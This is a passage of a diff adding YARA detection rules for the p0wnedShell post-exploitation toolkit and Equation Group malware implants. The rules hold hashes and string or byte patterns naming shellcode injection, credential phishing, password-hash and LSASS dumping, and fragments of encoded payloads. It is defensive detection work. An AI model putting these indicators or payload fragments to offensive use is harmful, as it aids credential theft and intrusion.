+      $x1 = "Pshell.RunPSCommand(Whoami);" fullword ascii
+      $x2 = "If succeeded this exploit should popup a System CMD Shell" fullword ascii
+   condition: 
+      all of them
+}
+
+rule p0wnedListenerConsole_RID2F78 : COBALTSTRIKE DEMO HKTL T1055 {
+   meta:
+      description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedListenerConsole_RID2F78.cs"
+      author = "Florian Roth"
+      reference = "https://github.com/Cn33liz/p0wnedShell"
+      date = "2017-01-14 11:58:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d2d84e65fad966a8556696fdaab5dc8110fc058c9e9caa7ea78aa00921ae3169"
+      tags = "COBALTSTRIKE, DEMO, HKTL, T1055"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Invoke_ReflectivePEInjection" fullword wide
+      $x5 = "p0wnedShell> " fullword wide
+      $x6 = "Resources.Get_PassHashes" fullword wide
+      $s7 = "Invoke_CredentialsPhish" fullword wide
+      $s8 = "Invoke_Shellcode" fullword wide
+      $s9 = "Resources.Invoke_TokenManipulation" fullword wide
+      $s10 = "Resources.Port_Scan" fullword wide
+      $s20 = "Invoke_PowerUp" fullword wide
+   condition: 
+      1 of them
+}
+
+rule p0wnedBinaries_RID2C8C : COBALTSTRIKE DEMO HKTL {
+   meta:
+      description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries_RID2C8C.cs"
+      author = "Florian Roth"
+      reference = "https://github.com/Cn33liz/p0wnedShell"
+      date = "2017-01-14 09:53:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fd7014625b58d00c6e54ad0e587c6dba5d50f8ca4b0f162d5af3357c2183c7a7"
+      tags = "COBALTSTRIKE, DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9" ascii
+      $x2 = "wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f" ascii
+      $x3 = "mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98" ascii
+      $x4 = "LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+" ascii
+      $x5 = "XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/" ascii
+      $x6 = "STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR" ascii
+      $x7 = "namespace p0wnedShell" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule p0wnedAmsiBypass_RID2D5B : COBALTSTRIKE DEMO HKTL {
+   meta:
+      description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass_RID2D5B.cs"
+      author = "Florian Roth"
+      reference = "https://github.com/Cn33liz/p0wnedShell"
+      date = "2017-01-14 10:28:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "345e8e6f38b2914f4533c4c16421d372d61564a4275537e674a2ac3360b19284"
+      tags = "COBALTSTRIKE, DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Program.P0wnedPath()" fullword ascii
+      $x2 = "namespace p0wnedShell" fullword ascii
+      $x3 = "H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe" ascii
+   condition: 
+      1 of them
+}
+
+rule p0wnedShell_outputs_RID2EDA : COBALTSTRIKE DEMO HKTL {
+   meta:
+      description = "p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs"
+      author = "Florian Roth"
+      reference = "https://github.com/Cn33liz/p0wnedShell"
+      date = "2017-01-14 11:32:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60"
+      tags = "COBALTSTRIKE, DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[+] For this attack to succeed, you need to have Admin privileges." fullword ascii
+      $s2 = "[+] This is not a valid hostname, please try again" fullword ascii
+      $s3 = "[+] First return the name of our current domain." fullword ascii
+   condition: 
+      1 of them
+}
+
+rule EquationGroup_modifyAudit_Implant_RID3476 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file modifyAudit_Implant.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 15:31:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b7902809a15c4c3864a14f009768693c66f9e9234204b873d29a87f4c3009a50"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "LSASS.EXE" fullword wide
+      $s2 = "hNtQueryInformationProcess" fullword ascii
+      $s3 = "hZwOpenProcess" fullword ascii
+      $s4 = ".?AVFeFinallyFailure@@" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 90KB and ( all of ( $s* ) ) ) or ( all of them )
+}
+
+rule EquationGroup_modifyAudit_Lp_RID325D : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file modifyAudit_Lp.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:02:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2a1f2034e80421359e3bf65cbd12a55a95bd00f2eb86cf2c2d287711ee1d56ad"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Read of audit related process memory failed" fullword wide
+      $s2 = "** This may indicate that another copy of modify_audit is already running **" fullword wide
+      $s3 = "Pattern match of code failed" fullword wide
+      $s4 = "Base for necessary auditing dll not found" fullword wide
+      $s5 = "Security auditing has been disabled" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 3 of them ) or ( all of them )
+}
+
+rule EquationGroup_ProcessHide_Lp_RID3237 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file ProcessHide_Lp.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 13:55:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cdee0daa816f179e74c90c850abd427fbfe0888dcfbc38bf21173f543cdcdc66"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Invalid flag.  Can only hide or unhide" fullword wide
+      $x2 = "Process elevation failed" fullword wide
+      $x3 = "Unknown error hiding process" fullword wide
+      $x4 = "Invalid process links found in EPROCESS" fullword wide
+      $x5 = "Unable to find SYSTEM process" fullword wide
+      $x6 = "Process hidden, but EPROCESS location lost" fullword wide
+      $x7 = "Invalid EPROCESS location for given ID" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 3 of them )
+}
+
+rule EquationGroup_EquationDrug_Gen_5_RID33A8 : APT DEMO EXE FILE GEN MAL {
+   meta:
+      description = "EquationGroup Malware - file PC_Level3_http_dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:57:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4ebfc1f6ec6a0e68e47e5b231331470a4483184cf715a578191b91ba7c32094d"
+      tags = "APT, DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Psxssdll.dll" fullword wide
+      $s2 = "Posix Server Dll" fullword wide
+      $s3 = "itanium" fullword wide
+      $s6 = "Copyright (C) Microsoft" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_PC_Level3_http_flav_dll_RID35A2 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file PC_Level3_http_flav_dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 16:21:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "27972d636b05a794d17cb3203d537bcf7c379fafd1802792e7fb8e72f130a0c4"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Psxssdll.dll" fullword wide
+      $s2 = "Posix Server Dll" fullword wide
+      $s4 = "itanium" fullword wide
+      $s5 = "RHTTP/1.0" fullword wide
+      $s8 = "Copyright (C) Microsoft" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_LSADUMP_Lp_RID2FF4 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file LSADUMP_Lp.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 12:19:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "LSADUMP - - ERROR - - Injected" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+}
+
+rule EquationGroup_nethide_Lp_RID30BF : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file nethide_Lp.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 12:53:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "137749c0fbb8c12d1a650f0bfc73be2739ff084165d02e4cb68c6496d828bf1d"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Error: Attempt to hide all TCP connections (any:any)." fullword wide
+      $x2 = "privilegeRunInKernelMode failed" fullword wide
+      $x3 = "Failed to unhide requested connection" fullword wide
+      $x4 = "Nethide running in USER_MODE" fullword wide
+      $x5 = "Not enough slots for all of the list.  Some entries may have not been hidden." fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( all of them )
+}
+
+rule EquationGroup_PC_Level4_flav_dll_x64_RID34C5 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file PC_Level4_flav_dll_x64"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 15:44:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "wship.dll" fullword wide
+      $s2 = "   IP:      " fullword ascii
+      $s3 = "\\\\.\\%hs" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_PC_Level4_flav_exe_RID338A : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file PC_Level4_flav_exe"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:52:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "33ba9f103186b6e52d8d69499512e7fbac9096e7c5278838127488acc3b669a9"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Extended Memory Runtime Process" fullword wide
+      $s2 = "memess.exe" fullword wide
+      $s3 = "\\\\.\\%hs" fullword ascii
+      $s4 = ".?AVOpenSocket@@" fullword ascii
+      $s5 = "Corporation. All rights reserved." fullword wide
+      $s6 = "itanium" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_processinfo_Implant_RID34A2 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file processinfo_Implant.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 15:38:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "aadfa0b1aec4456b10e4fb82f5cfa918dbf4e87d19a02bcc576ac499dda0fb68"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "hZwOpenProcessToken" fullword ascii
+      $s2 = "hNtQueryInformationProcess" fullword ascii
+      $s3 = "No mapping" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+}
+
+rule EquationGroup_EquationDrug_Gen_2_RID33A5 : APT DEMO EXE FILE GEN MAL {
+   meta:
+      description = "EquationGroup Malware - file PortMap_Implant.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:56:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "964762416840738b1235ed4ae479a4b117b8cdcc762a6737e83bc2062c0cf236"
+      tags = "APT, DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b } 
+      $op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 } 
+      $op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 250KB and all of them )
+}
+
+rule EquationGroup_EquationDrug_ntevt_RID342B : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file ntevt.sys"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 15:19:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "45e5e1ea3456d7852f5c610c7f4447776b9f15b56df7e3a53d57996123e0cebf"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ntevt.sys" fullword ascii
+      $s2 = "c:\\ntevt.pdb" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+}
+
+rule EquationGroup_nethide_Implant_RID32D8 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file nethide_Implant.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:22:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b2daf9058fdc5e2affd5a409aebb90343ddde4239331d3de8edabeafdb3a48fa"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\\\.\\dlcndi" fullword ascii
+      $s2 = "s\\drivers\\" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 90KB and all of them )
+}
+
+rule EquationGroup_EquationDrug_Gen_4_RID33A7 : APT DEMO EXE FILE GEN MAL {
+   meta:
+      description = "EquationGroup Malware - file PC_Level4_flav_dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:57:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "227faeb770ba538fb85692b3dfcd00f76a0a5205d1594bd0969a1e535ee90ee1"
+      tags = "APT, DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 11 8b da 23 df 8d 1c 9e c1 fb 02 33 da 23 df 33 } 
+      $op2 = { c3 0c 57 8b 3b eb 27 8b f7 83 7e 08 00 8b 3f 74 } 
+      $op3 = { 00 0f b7 5e 14 8d 5c 33 18 8b c3 2b 45 08 50 ff } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_EquationDrug_tdi6_RID3371 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file tdi6.sys"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:48:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "12c082f74c0916a0e926488642236de3a12072a18d29c97bead15bb301f4b3f8"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "tdi6.sys" fullword wide
+      $s3 = "TDI IPv6 Wrapper" fullword wide
+      $s5 = "Corporation. All rights reserved." fullword wide
+      $s6 = "FailAction" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+
+rule EquationGroup_modifyAuthentication_Implant_RID383F : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file modifyAuthentication_Implant.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 18:13:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e1dff24af5bfc991dca21b4e3a19ffbc069176d674179eef691afc6b1ac6f805"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "LSASS.EXE" fullword wide
+      $s2 = "hsamsrv.dll" fullword ascii
+      $s3 = "hZwOpenProcess" fullword ascii
+      $s4 = "hOpenProcess" fullword ascii
+      $s5 = ".?AVFeFinallyFailure@@" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_ntfltmgr_RID3031 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file ntfltmgr.sys"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 12:29:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ntfltmgr.sys" fullword wide
+      $s2 = "ntfltmgr.pdb" fullword ascii
+      $s4 = "Network Filter Manager" fullword wide
+      $s5 = "Corporation. All rights reserved." fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+
+rule EquationGroup_EquationDrug_msgkd_RID3410 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file msgkd.ex_"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 15:14:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "25eec68fc9f0d8d1b5d72c9eae7bee29035918e9dcbeab13e276dec4b2ad2a56"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "KEysud" fullword ascii
+      $s2 = "XWWWPWS" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_RunAsChild_Lp_RID31AB : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file RunAsChild_Lp.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 13:32:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1097e1d562341858e241f1f67788534c0e340a2dc2e75237d57e3f473e024464"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Privilege elevation failed" fullword wide
+      $s2 = "Unable to open parent process" fullword wide
+      $s4 = "Invalid input to lpRunAsChildPPC" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_EquationDrug_Gen_6_RID33A9 : APT DEMO EXE FILE GEN MAL {
+   meta:
+      description = "EquationGroup Malware - file PC_Level3_dll_x64"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:57:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "339855618fb3ef53987b8c14a61bd4519b2616e766149e0c21cbd7cbe7a632c9"
+      tags = "APT, DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Psxssdll.dll" fullword wide
+      $s2 = "Posix Server Dll" fullword wide
+      $s3 = "Copyright (C) Microsoft" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_PC_Level3_http_flav_dll_x64_RID36E3 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file PC_Level3_http_flav_dll_x64"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 17:15:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4e0209b4f5990148f5d6dee47dbc7021bf78a782b85cef4d6c8be22d698b884f"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Psxssdll.dll" fullword wide
+      $s2 = "Posix Server Dll" fullword wide
+      $s3 = ".?AVOpenSocket@@" fullword ascii
+      $s4 = "RHTTP/1.0" fullword wide
+      $s5 = "Copyright (C) Microsoft" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( all of ( $s* ) ) ) or ( all of them )
+}
+
+rule EquationGroup_EquationDrug_Gen_3_RID33A6 : APT DEMO EXE FILE GEN MAL {
+   meta:
+      description = "EquationGroup Malware - file mssld.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:56:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "69dcc150468f7707cc8ef618a4cea4643a817171babfba9290395ada9611c63c"
+      tags = "APT, DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } 
+      $op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } 
+      $op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule EquationGroup_GetAdmin_Lp_RID30E7 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file GetAdmin_Lp.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 12:59:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e1c9c9f031d902e69e42f684ae5b35a2513f7d5f8bca83dfbab10e8de6254c78"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Current user is System -- unable to join administrators group" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_ModifyGroup_Lp_RID3253 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file ModifyGroup_Lp.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:00:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dfb38ed2ca3870faf351df1bd447a3dc4470ed568553bf83df07bf07967bf520"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Modify Privileges failed" fullword wide
+      $s2 = "Given privilege name not found" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_EventLogEdit_Implant_RID34A1 : APT DEMO EXE FILE MAL T1050 {
+   meta:
+      description = "EquationGroup Malware - file EventLogEdit_Implant.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 15:38:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0bb750195fbd93d174c2a8e20bcbcae4efefc881f7961fdca8fa6ebd68ac1edf"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1050"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SYSTEM\\CurrentControlSet\\Services\\EventLog\\%ls" fullword wide
+      $s2 = "Ntdll.dll" fullword ascii
+      $s3 = "hZwOpenProcess" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+
+rule EquationGroup_PortMap_Lp_RID30A1 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file PortMap_Lp.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 12:48:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2b27f2faae9de6330f17f60a1d19f9831336f57fdfef06c3b8876498882624a6"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Privilege elevation failed" fullword wide
+      $s2 = "Portmap ended due to max number of ports" fullword wide
+      $s3 = "Invalid parameters received for portmap" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
+}
+
+rule EquationGroup_ProcessOptions_Lp_RID33A9 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file ProcessOptions_Lp.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:57:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "31d86f77137f0b3697af03dd28d6552258314cecd3c1d9dc18fcf609eb24229a"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Invalid parameter received by implant" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_PassFreely_Lp_RID31DC : APT DEMO EXE FILE MAL {
+   meta:
+      description = "EquationGroup Malware - file PassFreely_Lp.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 13:40:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fe42139748c8e9ba27a812466d9395b3a0818b0cd7b41d6769cb7239e57219fb"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Unexpected value in memory.  Run the 'CheckOracle' or 'memcheck' command to identify the problem" fullword wide
